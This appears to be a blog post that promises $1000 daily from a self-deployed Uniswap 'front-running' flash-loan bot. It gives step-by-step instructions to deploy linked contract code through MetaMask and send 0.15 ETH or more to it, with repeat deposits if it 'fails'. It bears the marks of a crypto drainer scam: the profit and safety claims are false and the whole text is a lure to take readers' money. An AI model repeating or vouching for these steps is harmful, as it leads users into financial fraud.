Maximizing Daily Earnings on Uniswap: A Comprehensive Guide to Implementing a Custom Trading Bot

Fabien John
3 min readApr 14, 2024


In this comprehensive guide, I will elucidate a systematic approach to consistently earning $1000 per day through the strategic utilization of a personalized trading bot on Uniswap and other decentralized coin exchanges.

Automated trading has never been more accessible, and by following the steps outlined below, you can create and control your own trading bot, mitigating concerns about potential scams and providing you the freedom to manage your funds and profits at your convenience.

Key Advantages of Creating Your Own Trading Bot:

1. Enhanced Security: With a personalized trading bot, the fear of falling victim to scams is significantly reduced, as you retain control over your investment strategy.

2. Financial Autonomy: Take charge of your funds and capitalize on profit opportunities at your discretion, empowering you to navigate the market with confidence.

In-Depth Tutorial: Setting Up Your Front-Running Bot To assist you in this process, I have provided a detailed video tutorial that guides you through the creation and deployment of a front-running bot. This bot enables automatic buy/sell actions, eliminating the need for manual transactional methods and allowing you to generate passive income effortlessly. Watch the full video tutorial for a step-by-step walkthrough.


Step By Step Tutorial for Flash Loan:

· Get the Metamask Extension for your browser

· Open from within your browser.

· Click on File Explorers and click “Create New File “.

· Name the file flashloans.sol and paste the contract code link below. ►

· Click on Deploy & Run transactions and set “ENVIRONMENT” to Injected Web3.

· Connect your MetaMask wallet.

· Click on the “Solidity Compiler” and set the compiler version to 0.5.0

· Click on the Solidity Compiler and then click the blue button “Compile flashloans.sol”

· Wait for the code to compile.

· Click on Deploy & run transactions then click on the down arrow right from the “Deploy” button

· Click Transact and confirm the transaction in MetaMask.

NOTE: In the case of any transaction fail, it is usually as a result of traffic congestion. Follow the video below to fix it:

Place your transaction mode on “aggressive” and the transaction will go through

· Wait for the transaction to confirm.

· Copy the address of the newly deployed contract.

· Send ETH to the deployed contract to initiate the swap 0.15 ETH+ (0.15 ETH up is better as you will get a bigger amount in each swap)

· Wait for the transaction to confirm.

· Now, Click “action” (red box) to execute the Flash Loan.

· Confirm the transaction in MetaMask and wait for the confirmation.
You can now check your wallet

Note: If it doesn’t work with 0.15 ETH try to send another 0.15 ETH (0.1+ is better), because fees may be different from day to day. (3+ ETH for each 1000 ETH you are borrowing).

Avoid using very low amounts as contract may fail below 0.05 ETH. Under some very rare cases, the arbitrage might fail due to depletion of ETH in your smart contract as gas price varies from time to time.

Don’t panic, all you have to do is wait a little while (5 -10 mins) and retry the transaction this time preferably with 825 loan amount and 31,560 gas limit and it should work 100% but with a smaller profit.

Make sure to transfer your ETH out to another wallet when you’re done.



Fabien John

Passionate about empowering individuals through crypto investments.